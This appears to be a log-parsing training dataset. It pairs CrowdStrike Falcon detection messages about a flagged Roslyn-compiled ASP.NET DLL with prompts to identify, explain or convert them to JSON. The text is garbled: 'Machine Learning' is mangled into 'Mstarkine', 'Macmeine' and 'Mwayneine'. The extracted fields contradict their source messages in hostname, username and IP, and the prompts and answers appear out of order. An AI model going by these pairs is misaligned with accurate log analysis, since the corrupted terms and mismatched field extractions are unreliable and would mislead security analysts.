ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\uprfi4r5.cmdline\"","parent_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761464850144"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=95.100.116.230 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=johndoe ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.starkint.com ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"99994fe08640433a925c1d14d7175b2b","timestamp":"2023-10-18T15:34:44Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:johndoe.F.Z_dua+xQpvLuzUtnGY1TVjD6x\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mstarkine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mstarkine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mstarkine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\App_Web_jjafca5y.dll","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1290","control_graph_id":"ctg:99994fe08640433a925c1d14d7175b2b:77309819454","triggering_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761467075508","sha256":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\uprfi4r5.cmdline\"","parent_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761464850144"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=95.100.116.230 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=johndoe ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.starkint.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: NVISAASUATWEB01.devnvi.paygoint.com clientmac: 0a3ab18031e1 filehash: 4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 filename: VBCSCompiler.exe filepath: \Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-10-18T15:34:44Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 95.100.116.230 userName: johndoe
Explain this syslog message
WitFoo-Artifact ::: message={"device_id":"99994fe08640433a925c1d14d7175b2b","timestamp":"2023-10-18T15:34:44Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:bob.F.Z_dua+xQpvLuzUtnGY1TVjD6x\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Macmeine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Macmeine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor macmeine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\App_Web_jjafca5y.dll","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1290","control_graph_id":"ctg:99994fe08640433a925c1d14d7175b2b:77309819454","triggering_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761467075508","sha256":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\uprfi4r5.cmdline\"","parent_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761464850144"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=23.107.77.180 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=bob ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch
{ "clienthostname": "NVISAASUATWEB01.devnvi.paygoint.com", "clientmac": "0a3ab18031e1", "filehash": "4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9", "filename": "VBCSCompiler.exe", "filepath": "\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"99994fe08640433a925c1d14d7175b2b\",\"timestamp\":\"2023-10-18T15:34:44Z\",\"behavior_id\":\"5737\",\"filename\":\"VBCSCompiler.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\PayGo\\\\UAT_Greer\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"D:\\\\PayGo\\\\UAT_Greer\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\\\" \\\"-pipename:bob.F.Z_dua+xQpvLuzUtnGY1TVjD6x\\\"\",\"scenario\":\"NGAV\",\"objective\":\"Falcon Detection Method\",\"tactic\":\"Macmeine Learning\",\"tactic_id\":\"CSTA0004\",\"technique\":\"Sensor-based ML\",\"technique_id\":\"CST0007\",\"display_name\":\"Macmeine Learning Identified Medium Confidence Malicious File\",\"description\":\"A file written to the file system meets the on-sensor macmeine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.\",\"severity\":50,\"confidence\":50,\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9\",\"ioc_source\":\"file_write\",\"ioc_description\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6fc660c9\\\\a8ee7210\\\\App_Web_jjafca5y.dll\",\"user_name\":\"bob\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-1290\",\"control_graph_id\":\"ctg:99994fe08640433a925c1d14d7175b2b:77309819454\",\"triggering_process_graph_id\":\"pid:99994fe08640433a925c1d14d7175b2b:761467075508\",\"sha256\":\"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9\",\"md5\":\"\",\"parent_details\":{\"parent_sha256\":\"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d\",\"parent_md5\":\"7dc642657b7cb790d687332f6d18feae\",\"parent_cmdline\":\"\\\"D:\\\\PayGo\\\\UAT_Greer\\\\Portal\\\\bin\\\\roslyn\\\\csc.exe\\\" /shared /keepalive:\\\"10\\\" /noconfig /fullpaths @\\\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6fc660c9\\\\a8ee7210\\\\uprfi4r5.cmdline\\\"\",\"parent_process_graph_id\":\"pid:99994fe08640433a925c1d14d7175b2b:761464850144\"},\"pattern_disposition\":128,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_macmeine\":false,\"quarantine_file\":true,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=23.107.77.180 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe ::: userName=bob ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-10-18T15:34:44Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "23.107.77.180", "userName": "bob" }
Create a JSON artifact from the message
WitFoo-Artifact ::: message={"device_id":"99994fe08640433a925c1d14d7175b2b","timestamp":"2023-10-18T15:34:44Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:bob.F.Z_dua+xQpvLuzUtnGY1TVjD6x\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Macmeine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Macmeine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor macmeine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\App_Web_jjafca5y.dll","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1290","control_graph_id":"ctg:99994fe08640433a925c1d14d7175b2b:77309819454","triggering_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761467075508","sha256":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\uprfi4r5.cmdline\"","parent_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761464850144"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=23.107.77.180 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=bob ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"99994fe08640433a925c1d14d7175b2b","timestamp":"2023-10-18T15:34:44Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:bob.F.Z_dua+xQpvLuzUtnGY1TVjD6x\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Macmeine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Macmeine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor macmeine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\App_Web_jjafca5y.dll","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1290","control_graph_id":"ctg:99994fe08640433a925c1d14d7175b2b:77309819454","triggering_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761467075508","sha256":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\uprfi4r5.cmdline\"","parent_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761464850144"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=23.107.77.180 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=bob ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: NVISAASUATWEB01.devnvi.paygoint.com clientmac: 0a3ab18031e1 filehash: 4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 filename: VBCSCompiler.exe filepath: \Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-10-18T15:34:44Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 23.107.77.180 userName: bob
Explain this syslog message
WitFoo-Artifact ::: message={"device_id":"289d83eb622a40d58196e54957152b03","timestamp":"2023-08-25T11:20:20Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:johndoe.F.A34eygCs1aJfPpzR6O_cjJw2t\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mwayneine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mwayneine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mwayneine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\App_Web_kvvwjyjq.dll","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1249","control_graph_id":"ctg:289d83eb622a40d58196e54957152b03:60130083149","triggering_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770815250147","sha256":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\pqwjm4kv.cmdline\"","parent_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770812509131"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=91.202.71.43 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=johndoe ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.wayneint.com ::: pipelineEntrypoint=dispatch
{ "clienthostname": "NVISAASQATWEB01.devnvi.paygoint.com", "clientmac": "0accca51756b", "filehash": "1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5", "filename": "VBCSCompiler.exe", "filepath": "\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"289d83eb622a40d58196e54957152b03\",\"timestamp\":\"2023-08-25T11:20:20Z\",\"behavior_id\":\"5737\",\"filename\":\"VBCSCompiler.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\PayGo\\\\QA_SRP_Latest\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"D:\\\\PayGo\\\\QA_SRP_Latest\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\\\" \\\"-pipename:johndoe.F.A34eygCs1aJfPpzR6O_cjJw2t\\\"\",\"scenario\":\"NGAV\",\"objective\":\"Falcon Detection Method\",\"tactic\":\"Mwayneine Learning\",\"tactic_id\":\"CSTA0004\",\"technique\":\"Sensor-based ML\",\"technique_id\":\"CST0007\",\"display_name\":\"Mwayneine Learning Identified Medium Confidence Malicious File\",\"description\":\"A file written to the file system meets the on-sensor mwayneine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.\",\"severity\":50,\"confidence\":50,\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5\",\"ioc_source\":\"file_write\",\"ioc_description\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6e657b17\\\\3c955147\\\\App_Web_kvvwjyjq.dll\",\"user_name\":\"johndoe\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-1249\",\"control_graph_id\":\"ctg:289d83eb622a40d58196e54957152b03:60130083149\",\"triggering_process_graph_id\":\"pid:289d83eb622a40d58196e54957152b03:770815250147\",\"sha256\":\"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5\",\"md5\":\"\",\"parent_details\":{\"parent_sha256\":\"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d\",\"parent_md5\":\"7dc642657b7cb790d687332f6d18feae\",\"parent_cmdline\":\"\\\"D:\\\\PayGo\\\\QA_SRP_Latest\\\\Portal\\\\bin\\\\roslyn\\\\csc.exe\\\" /shared /keepalive:\\\"10\\\" /noconfig /fullpaths @\\\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6e657b17\\\\3c955147\\\\pqwjm4kv.cmdline\\\"\",\"parent_process_graph_id\":\"pid:289d83eb622a40d58196e54957152b03:770812509131\"},\"pattern_disposition\":128,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mwayneine\":false,\"quarantine_file\":true,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=91.202.71.43 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe ::: userName=johndoe ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.wayneint.com ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-08-25T11:20:20Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "91.202.71.43", "userName": "johndoe" }
Create a JSON artifact from the message
